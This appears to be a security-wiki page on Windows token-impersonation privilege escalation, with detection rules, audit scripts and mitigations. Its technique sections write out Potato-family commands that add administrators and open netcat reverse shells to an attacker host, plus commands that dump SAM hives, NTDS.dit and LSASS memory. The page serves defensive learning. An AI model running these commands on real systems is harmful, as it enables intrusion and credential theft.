Token Impersonation

Overview

Windows uses access tokens to track security context for processes and threads. When a service account (e.g., IIS, MSSQL, or a web application service) has SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, it can impersonate any token it obtains — including SYSTEM tokens. The "Potato" family of exploits abuses Windows COM/RPC mechanisms to coerce SYSTEM to authenticate to the attacker's controlled listener, then captures and impersonates the resulting token.

ATT&CK Mapping

  • Tactic: TA0004 - Privilege Escalation
  • Technique: T1134.001 - Access Token Manipulation: Token Impersonation/Theft

Prerequisites

  • Shell access as a user with SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege
  • Common service accounts with these privileges: IIS APPPOOL, NT Service\MSSQL, LOCAL SERVICE, NETWORK SERVICE
  • Check with: whoami /priv

Techniques

Identifying Token Privileges

:: Check current token privileges
whoami /priv

:: Key privileges for impersonation:
:: SeImpersonatePrivilege       — Impersonate a client after authentication
:: SeAssignPrimaryTokenPrivilege — Replace a process level token

If either privilege is listed (even if "Disabled"), it can be used — "Disabled" means not currently active but can be enabled programmatically.
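To audit a service account's token the way this section describes, the following added example (not part of the original page) parses `whoami /priv` output and reports the privileges covered here, treating Disabled ones as held. The sample output is constructed.

```python
# Privileges that make a token a privilege-escalation risk and what they grant.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate any token the process obtains (Potato family)",
    "SeAssignPrimaryTokenPrivilege": "assign an obtained token as a new process's primary token",
    "SeBackupPrivilege": "read any file or registry hive regardless of ACLs",
    "SeDebugPrivilege": "open any process, including LSASS and SYSTEM processes",
}

# Constructed sample of `whoami /priv` output for an IIS application pool identity.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""


def parse_whoami_priv(text):
    """Return {privilege_name: state} from `whoami /priv` output.

    Everything up to and including the '=====' separator is header. On each
    data row the first field is the privilege name and the last is its state;
    the description in between may contain spaces, so it is never split on."""
    lines = text.splitlines()
    sep = next(i for i, line in enumerate(lines) if line.startswith("="))
    privs = {}
    for line in lines[sep + 1:]:
        fields = line.split()
        if len(fields) >= 2:
            privs[fields[0]] = fields[-1]
    return privs


def assess_token(text):
    """List high-risk privileges the token holds, in HIGH_RISK order.

    A Disabled privilege is still held: the process can enable it with
    AdjustTokenPrivileges, so the state is reported but never used to exclude."""
    privs = parse_whoami_priv(text)
    return [(name, privs[name], why) for name, why in HIGH_RISK.items() if name in privs]


if __name__ == "__main__":
    for name, state, why in assess_token(SAMPLE_WHOAMI_PRIV):
        print(f"{name:<30} {state:<9} {why}")
```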

Potato Exploits

The Potato family forces SYSTEM to authenticate to a local listener, captures the token, and impersonates it. Different variants target different Windows versions and COM/RPC mechanisms.

JuicyPotato (Windows Server 2008-2016, Windows 7-10 before 1809):

:: JuicyPotato
:: https://github.com/ohpe/juicy-potato
JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" -t *

:: With specific CLSID (some CLSIDs work better on specific OS versions)
JuicyPotato.exe -l 1337 -p cmd.exe -a "/c net localgroup administrators <user> /add" -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

:: Execute a reverse shell
JuicyPotato.exe -l 1337 -p cmd.exe -a "/c C:\Users\Public\nc.exe <attacker> 4444 -e cmd.exe" -t *

PrintSpoofer (Windows 10 1809+, Server 2019+):

:: PrintSpoofer
:: https://github.com/itm4n/PrintSpoofer
:: Interactive SYSTEM shell
PrintSpoofer.exe -i -c cmd.exe

:: Execute a command as SYSTEM
PrintSpoofer.exe -c "cmd /c whoami"

:: Reverse shell
PrintSpoofer.exe -c "cmd /c C:\Users\Public\nc.exe <attacker> 4444 -e cmd.exe"

GodPotato (Windows 8-11, Server 2012-2022):

:: GodPotato
:: https://github.com/BeichenDream/GodPotato
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "cmd /c net localgroup administrators <user> /add"

SweetPotato (multiple techniques combined):

:: SweetPotato
:: https://github.com/CCob/SweetPotato
SweetPotato.exe -p cmd.exe -a "/c whoami"

SeBackupPrivilege

Allows reading any file on the system, regardless of ACLs:

:: Copy SAM and SYSTEM hives for offline credential extraction
reg save HKLM\SAM C:\Users\Public\sam.bak
reg save HKLM\SYSTEM C:\Users\Public\system.bak
reg save HKLM\SECURITY C:\Users\Public\security.bak

:: Extract hashes on attacker machine
:: impacket-secretsdump -sam sam.bak -system system.bak -security security.bak LOCAL
# PowerShell: copy NTDS.dit on a Domain Controller (also requires SeBackupPrivilege)

# Enable the privilege on the current token (SeBackupPrivilege cmdlet DLLs)
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege

# Copy NTDS.dit with robocopy in backup mode (/b), which uses SeBackupPrivilege to bypass the file ACL
robocopy /b C:\Windows\NTDS C:\Users\Public ntds.dit

SeDebugPrivilege

Allows debugging any process — can be used to inject code into SYSTEM processes or dump LSASS:

:: Dump LSASS process memory for credential extraction
:: Requires SeDebugPrivilege
:: Task Manager > Details > lsass.exe > Create dump file

:: Or use procdump (Sysinternals)
procdump.exe -accepteula -ma lsass.exe lsass.dmp

Metasploit Token Impersonation

# From a Meterpreter session
# Metasploit Framework
# https://github.com/rapid7/metasploit-framework

# List available tokens
load incognito
list_tokens -u

# Impersonate a token
impersonate_token "NT AUTHORITY\\SYSTEM"
impersonate_token "DOMAIN\\Admin"

# Drop back to original token
rev2self

Detection Methods

Network-Based Detection

  • Named pipe connections to unusual endpoints (Potato exploit indicators)
  • DCOM/RPC traffic patterns associated with Potato exploits

Host-Based Detection

  • Monitor for token impersonation (Security Event ID 4688 process creation records carry a Token Elevation Type field)
  • Alert on known Potato binary names or hashes
  • Monitor for processes spawned as SYSTEM from service account parent processes
  • LSASS memory access events (Sysmon Event ID 10)
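The host-based rules above, written out as detection logic over normalized Windows events, as an added example that is not part of the original page. The event schema ("process_create" for Security 4688 / Sysmon 1, "process_access" for Sysmon 10, field names mirroring the Windows event fields) and the sample events are constructed assumptions.

```python
import re

# Low-privilege service identities that hold SeImpersonatePrivilege by default.
# A SYSTEM child spawned from one of these parents is the classic post-Potato pattern.
SERVICE_ACCOUNTS = {"NT AUTHORITY\\LOCAL SERVICE", "NT AUTHORITY\\NETWORK SERVICE"}
SERVICE_ACCOUNT_PREFIXES = ("IIS APPPOOL\\", "NT SERVICE\\")
PROCESS_VM_READ = 0x0010  # access right needed to read LSASS memory (Sysmon 10 GrantedAccess)
KNOWN_TOOL_NAMES = re.compile(r"potato|printspoofer", re.IGNORECASE)

# Constructed, normalized events (assumed schema, see lead-in).
SAMPLE_EVENTS = [
    {"type": "process_create", "user": "NT AUTHORITY\\SYSTEM", "parent_user": "IIS APPPOOL\\DefaultAppPool",
     "image": "C:\\Windows\\System32\\cmd.exe", "parent_image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe"},
    {"type": "process_create", "user": "NT AUTHORITY\\SYSTEM", "parent_user": "NT AUTHORITY\\SYSTEM",
     "image": "C:\\Windows\\System32\\svchost.exe", "parent_image": "C:\\Windows\\System32\\services.exe"},
    {"type": "process_create", "user": "NT AUTHORITY\\NETWORK SERVICE", "parent_user": "NT AUTHORITY\\NETWORK SERVICE",
     "image": "C:\\Users\\Public\\GodPotato.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe"},
    {"type": "process_access", "source_image": "C:\\Users\\Public\\procdump.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": 0x1FFFFF},
    {"type": "process_access", "source_image": "C:\\Windows\\System32\\svchost.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": 0x1000},
]


def is_service_account(user):
    user = user.upper()
    return user in SERVICE_ACCOUNTS or user.startswith(SERVICE_ACCOUNT_PREFIXES)


def evaluate(event):
    """Return the alert strings raised by one event (empty list if benign)."""
    alerts = []
    if event["type"] == "process_create":
        if event["user"].upper() == "NT AUTHORITY\\SYSTEM" and is_service_account(event["parent_user"]):
            alerts.append(f"SYSTEM process {event['image']} spawned by {event['parent_user']} via {event['parent_image']}")
        if KNOWN_TOOL_NAMES.search(event["image"]):
            alerts.append(f"known Potato-family tool name: {event['image']}")
    elif event["type"] == "process_access":
        # Only access masks that include PROCESS_VM_READ can dump LSASS memory; 0x1000
        # (PROCESS_QUERY_LIMITED_INFORMATION) is routine and stays silent.
        if event["target_image"].lower().endswith("\\lsass.exe") and event["granted_access"] & PROCESS_VM_READ:
            alerts.append(f"LSASS memory read by {event['source_image']} (GrantedAccess 0x{event['granted_access']:X})")
    return alerts


def scan(events):
    """Return [(event_index, alert)] over a batch of events."""
    return [(i, a) for i, e in enumerate(events) for a in evaluate(e)]


if __name__ == "__main__":
    for i, alert in scan(SAMPLE_EVENTS):
        print(f"event {i}: {alert}")
```

Name matching is the weakest of the three rules, since a renamed binary defeats it; the parent/child identity rule and the LSASS access-mask rule do not depend on the tool's name.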

Mitigation Strategies

  • Remove unnecessary privileges — remove SeImpersonatePrivilege from service accounts that don't need it
  • Use Group Managed Service Accounts (gMSA) — limited privileges by default
  • Patch Windows — newer versions mitigate older Potato variants
  • Credential Guard — protects LSASS from memory dumps
  • Monitor privilege usage — audit token manipulation events
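A way to check the first mitigation against the local security policy, as an added example that is not part of the original page: it parses the [Privilege Rights] section of a `secedit /export /cfg` template and lists every holder of the privileges covered here beyond the Windows defaults. The template fragment is constructed, and the default-holder sets are assumed to be those of a standalone or member server.

```python
# Default holders per privilege on a member server, as well-known SIDs
# (S-1-5-6 SERVICE, S-1-5-19 LOCAL SERVICE, S-1-5-20 NETWORK SERVICE,
# S-1-5-32-544 Administrators, S-1-5-32-551 Backup Operators).
DEFAULT_HOLDERS = {
    "SeImpersonatePrivilege": {"*S-1-5-6", "*S-1-5-19", "*S-1-5-20", "*S-1-5-32-544"},
    "SeAssignPrimaryTokenPrivilege": {"*S-1-5-19", "*S-1-5-20"},
    "SeBackupPrivilege": {"*S-1-5-32-544", "*S-1-5-32-551"},
    "SeDebugPrivilege": {"*S-1-5-32-544"},
}

# Constructed fragment of a `secedit /export /cfg` template (the real file is UTF-16).
# Holders are '*'-prefixed SIDs, or account names when no SID could be resolved.
SAMPLE_TEMPLATE = """\
[Privilege Rights]
SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6,*S-1-5-21-1111-2222-3333-1105
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20,CORP\\svc-report
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
SeDebugPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_privilege_rights(template):
    """Return {privilege: set(holders)} from the [Privilege Rights] section only."""
    rights, in_section = {}, False
    for raw in template.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line == "[Privilege Rights]"
        elif in_section and "=" in line:
            name, _, holders = line.partition("=")
            rights[name.strip()] = {h.strip() for h in holders.split(",") if h.strip()}
    return rights


def non_default_holders(template):
    """Return {privilege: extra holders} beyond the Windows defaults for the
    privileges this page covers; each extra should be justified or removed.
    SERVICE (S-1-5-6) is in the token of every process the Service Control
    Manager starts, so removing the right per account does not affect those."""
    rights = parse_privilege_rights(template)
    return {priv: rights.get(priv, set()) - defaults
            for priv, defaults in DEFAULT_HOLDERS.items()
            if rights.get(priv, set()) - defaults}


if __name__ == "__main__":
    for priv, holders in non_default_holders(SAMPLE_TEMPLATE).items():
        print(f"{priv}: non-default holders {sorted(holders)}")
```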
